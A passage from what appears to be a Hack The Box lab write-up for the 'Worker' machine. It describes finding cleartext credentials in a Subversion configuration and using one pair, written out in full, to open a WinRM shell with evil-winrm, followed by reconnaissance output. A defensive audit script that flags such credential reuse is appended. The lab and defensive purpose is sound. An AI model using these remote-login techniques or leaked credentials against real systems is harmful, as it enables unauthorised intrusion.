WinRM
A file containing a list of many cleartext credential pairs was found in the configuration directory of the target Subversion server instance. The credential of the robisl user was listed in the file and was later validated by a brute-force attack.
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ evil-winrm -i $IP -u robisl -p wolves11
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\robisl\Documents> whoami
worker\robisl
*evil-winrm* ps c:\Users\robisl\Documents> hostname
Worker
*evil-winrm* ps c:\Users\robisl\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::248
ipv6 address. . . . . . . . . . . : dead:beef::88b5:926:be4b:fd40
link-local ipv6 address . . . . . : fe80::88b5:926:be4b:fd40%4
ipv4 address. . . . . . . . . . . : 10.10.10.203
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
10.10.10.2
Lateral movement was made to the robisl user via WinRM.
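A defender-side check for the exposure described above, as an added example that is not part of the original writeup: it parses a Subversion password file and flags cleartext entries whose username also belongs to an account permitted to log on over WinRM. The `[users]` / `name = password` layout, the sample entries, and the WinRM account list are assumptions constructed for illustration.

```python
import configparser

# Constructed sample of an svnserve-style password file (assumed format:
# a [users] section holding "name = password" pairs in cleartext).
SAMPLE_PASSWD = """\
[users]
alice = example-pass-1
robisl = example-pass-2
# harry = commented-out
svc_build = example-pass-3
"""

# Constructed list of OS accounts allowed to log on over WinRM
# (assumption: e.g. members of the local "Remote Management Users" group).
SAMPLE_WINRM_USERS = ["Administrator", "robisl"]


def parse_svn_passwd(text):
    """Return {username: password} for every active entry under [users]."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep usernames exactly as written
    parser.read_string(text)
    if not parser.has_section("users"):
        return {}
    return dict(parser.items("users"))


def audit(passwd_text, winrm_users):
    """Flag cleartext SVN accounts whose name matches a WinRM-capable account."""
    entries = parse_svn_passwd(passwd_text)
    remote = {u.lower() for u in winrm_users}  # Windows names are case-insensitive
    findings = []
    for name in entries:
        # The password itself is deliberately left out of the report.
        findings.append({
            "user": name,
            "cleartext": True,
            "winrm_overlap": name.lower() in remote,
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_PASSWD, SAMPLE_WINRM_USERS):
        level = "HIGH" if f["winrm_overlap"] else "MEDIUM"
        print(f"[{level}] cleartext SVN credential for {f['user']}"
              f" (WinRM-capable account: {f['winrm_overlap']})")
```

Any entry reported with an overlap is a candidate for immediate password rotation, since a password shared between the repository and the operating system account gives remote shell access.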